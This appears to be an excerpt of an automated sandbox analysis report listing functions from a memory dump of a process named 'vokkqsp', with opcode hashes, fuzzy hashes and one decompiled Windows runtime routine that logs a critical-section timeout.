                                                      • Opcode Fuzzy Hash: 8a41753f4d0d952042517882f0065179e87db28a75c7b92ba12b29c344de32d9
                                                      • Instruction Fuzzy Hash: 17814E75A002199FDF24CF98C581BEDBBF5EF08350F14806AE945AB381E735AD05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA98A0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
                                                      • Instruction ID: 80e7c74b88f51f5b80398f446ee9277c9114b3a0ad81874ba7596e57ede1daa3
                                                      • Opcode Fuzzy Hash: 642c9eb89ff61dea4fc0fcc377602bdffb73801bd9e275d6b7473f7af850604a
                                                      • Instruction Fuzzy Hash: 3690026130100403D24261694414646040DD7D2385F91C032E1414555ED6659953F172
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9820 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
                                                      • Instruction ID: f719995656ee623fe352466aea71d6d429b4a295b24b0a4bbf22f93bc17f59a5
                                                      • Opcode Fuzzy Hash: dbab123aedc6325027a01a29262ed1a7c9adae6a658414d64df24516cdff8b74
                                                      • Instruction Fuzzy Hash: B690027124100403D28171694404646040DE7D1381F91C032A0414554FD6959A56FAA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AAB040 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
                                                      • Instruction ID: ea4102b01792301a5e92dc3d108d4c7b813b652b012769d5aa7e9908f8e3d3c0
                                                      • Opcode Fuzzy Hash: ef234063dc19f210a70bae7428b66babca74d45755b0a2ab5029f4164c4f962c
                                                      • Instruction Fuzzy Hash: E69002A1601140434680B16948044465419E7E2341791C131A0444560DD6A89855E2A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA99D0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
                                                      • Instruction ID: d642fb31bcf3141b8e6508ba1b20ec6347d49ddaa7ff503e7b7ee80854962304
                                                      • Opcode Fuzzy Hash: a86d4458615c32696607ee7822342cbe61ce772ec181f27ea8fd5bfc0a6f2b36
                                                      • Instruction Fuzzy Hash: 249002A121100043D244616944047460449D7E2341F51C032A2144554DD5699C61A165
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9950 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
                                                      • Instruction ID: e9433365228d043fac525cc9de086db07c8b76303feca9347528c0b528c59f52
                                                      • Opcode Fuzzy Hash: 4f30ca6b83e0060b12c5ee421a4b3ea684fab9d9299c4989f7dbef5228d93b61
                                                      • Instruction Fuzzy Hash: 939002A120140403D280656948046470409D7D1342F51C031A2054555FDA699C51B175
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9A80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
                                                      • Instruction ID: 936949fc0e195b3af87fcc8b50261bb1b15fd386ce1bef0e7766b1d19d1683af
                                                      • Opcode Fuzzy Hash: 2b931fe39de15e83f2d5088335ae1216ff6f51a85aa9d4699440d2b402625700
                                                      • Instruction Fuzzy Hash: A990026120144443D28062694804B4F4509D7E2342F91C039A4146554DD9559855A761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9A10 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
                                                      • Instruction ID: 7fed28f27017d91fe909a0e699115d7c32b0c8d7970a2ed767ae396e20846922
                                                      • Opcode Fuzzy Hash: 3cec0d34fa8c5ad8fd99880f9166ab7235441e3732bd9e4974a18dde3bf06b73
                                                      • Instruction Fuzzy Hash: 5390027120140403D240616948087870409D7D1342F51C031A5154555FD6A5D891B571
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AAA3B0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
                                                      • Instruction ID: b5d0f9ce3fb4aada2f14b424a84e755e03a42f629bab66f3d7a7c4552aa4476f
                                                      • Opcode Fuzzy Hash: 944075773fbd0cb4e681be7bdb4c34e59ee2af17bbd1dad6dd3db8d8b5ddd3b6
                                                      • Instruction Fuzzy Hash: 6190027120144003D2807169844464B5409E7E1341F51C431E0415554DD6559856E261
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9B00 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
                                                      • Instruction ID: 776c23441be3428e992387b3eba48c1286d5062ad414485a7b5721b9e89eb18f
                                                      • Opcode Fuzzy Hash: a27cc5cc4dd8afb5a6faafa49f8ca1fe9297ee6eca6566a6397bc546049132c5
                                                      • Instruction Fuzzy Hash: 2490026124100803D28071698414747040AD7D1741F51C031A0014554ED6569965B6F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA95F0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
                                                      • Instruction ID: 9d74921b52bca0e5f4827e61ae14116197f4e33ba98693b6aaf6dfc56a16dac2
                                                      • Opcode Fuzzy Hash: a1ba93e07d84be9c638fffe892155426d116ca7422aa2dd84ec44db0186891d4
                                                      • Instruction Fuzzy Hash: 3390027120100803D244616948046C60409D7D1341F51C031A6014655FE6A59891B171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
                                                      • Instruction ID: 7d9662ad6e8a3fed1e88dd751ce4400a17061ec5250e468d676ad3c083087444
                                                      • Opcode Fuzzy Hash: d3262ed5090320239eb0d62a0cef7ea9590f51a9383df634a5be37d2ac37b069
                                                      • Instruction Fuzzy Hash: 889002E1201140934640A2698404B4A4909D7E1341F51C036E1044560DD5659851E175
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AAAD30 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
                                                      • Instruction ID: 34e9d23b28d07dda06aa8d4f62a22997667d2d4d74561f2e18c7cb25afe26bca
                                                      • Opcode Fuzzy Hash: 62fb9d8e3972fe3c2372059165309c6db8f1890b28b3c6dd8f8ad052b60e8a8c
                                                      • Instruction Fuzzy Hash: CE900271A0500013928071694814686440AE7E1781F55C031A0504554DD9949A55A3E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9560 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
                                                      • Instruction ID: 3e5ee99703103bf0c494ce5b740914bb704dc17833dd4cc4dfcae72819f0a1b8
                                                      • Opcode Fuzzy Hash: 807c7c3c4ea71f69cbc52fcb2c5ebad7b85942768e21f6a59e9ef5d9edbf1ac9
                                                      • Instruction Fuzzy Hash: BD900265221000030285A569060454B0849E7D7391791C035F1406590DD6619865A361
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA96D0 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
                                                      • Instruction ID: 53d2bf8f1b0d460efcd76ed25c909f7e08799cc461d3d10a605fa2e80575f851
                                                      • Opcode Fuzzy Hash: c717cff61ccb43fedfba088290d1647c2aa7196fd359bf905ec1a0e33c3671dc
                                                      • Instruction Fuzzy Hash: 4490027120100843D24061694404B860409D7E1341F51C036A0114654ED655D851B561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9610 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
                                                      • Instruction ID: a9ede3f7c53e25d79cfd4b8e9e7ab47ef1a10a3254a9be50b3da8e2cb2080f6c
                                                      • Opcode Fuzzy Hash: c67040dbf8fec358a8ad22804a1dc878ed713e8c2d69e346b7b3533f76365146
                                                      • Instruction Fuzzy Hash: 5E90027160500803D290716944147860409D7D1341F51C031A0014654ED7959A55B6E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9650 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
                                                      • Instruction ID: c084f8f012757f0d8577e2c57e4afae6fd6f9ea66af732f8ed40cab02e9168f7
                                                      • Opcode Fuzzy Hash: 58cd91f686df796bfb5bc47276fa1236813a9e44e8c53aa90c04331b943d09af
                                                      • Instruction Fuzzy Hash: 4790027120504843D28071694404A860419D7D1345F51C031A0054694EE6659D55F6A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9730 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
                                                      • Instruction ID: 02f0165ac3a81477885a747cb44e45e695ecb3afb0d27b0a62c6ce26b9f2ab04
                                                      • Opcode Fuzzy Hash: 1aa518a431db8f3fbf8dab5a7c5c6332b0a3fe47b082b5ba08aea8963dc7d359
                                                      • Instruction Fuzzy Hash: EF90026160500403D280716954187460419D7D1341F51D031A0014554ED6999A55B6E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AAA710 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
                                                      • Instruction ID: d28de0b2940ae967444aac691aa3b382a3b9abd4964a1e1fd030553d0fadbc3c
                                                      • Opcode Fuzzy Hash: f11f42688422bbc866fa7ca59c1251a679a157c5348223cfc49f5d9060a121ec
                                                      • Instruction Fuzzy Hash: 6C900271301000539640A6A95804A8A4509D7F1341F51D035A4004554DD5949861A161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9760 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
                                                      • Instruction ID: f0913206a4ae92bd550c2b46d54513cd428747659343a1f707c27b14d2a72613
                                                      • Opcode Fuzzy Hash: 40f369818cbe01a39cc72b3055df0d2a12d602eba24952e00c01333135c411b9
                                                      • Instruction Fuzzy Hash: 6690027120100403D240616955087470409D7D1341F51D431A0414558EE6969851B161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9770 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
                                                      • Instruction ID: 89f98db0f3eb6d282948df418d73f6c62b2f969274da9508d1c86c7113ec9258
                                                      • Opcode Fuzzy Hash: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
                                                      • Instruction Fuzzy Hash: 5990026120504443D24065695408A460409D7D1345F51D031A1054595ED6759851F171
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AAA770 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
                                                      • Instruction ID: 1407dcf5a6e870b0e1fffdcd91625bba82f79131df090ed1ac233d2e2e9f6331
                                                      • Opcode Fuzzy Hash: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
                                                      • Instruction Fuzzy Hash: CE90027520504443D64065695804AC70409D7D1345F51D431A041459CED6949861F161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AA9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: 5af8322f4f95ad0ade0990ce6918233cddeed9e1a90a3dff63dd899b2780db26
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00AFFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E00AFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                      0x00affdda
                                                      0x00affde2
                                                      0x00affde5
                                                      0x00affdec
                                                      0x00affdfa
                                                      0x00affdff
                                                      0x00affe0a
                                                      0x00affe0f
                                                      0x00affe17
                                                      0x00affe1e
                                                      0x00affe19
                                                      0x00affe19
                                                      0x00affe19
                                                      0x00affe20
                                                      0x00affe21
                                                      0x00affe22
                                                      0x00affe25
                                                      0x00affe40

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AFFDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AFFE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AFFE01
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.344637364.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_a40000_vokkqsp.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                                                      • Instruction ID: e48dd4179ea285de304f4e78694fd3cf748494568bc6589bbaec442085be3071
                                                      • Opcode Fuzzy Hash: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                                                      • Instruction Fuzzy Hash: FEF0F632640605BFEA201A95DD02F33BF6AEB45730F240714F728565E2EA62F82097F0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%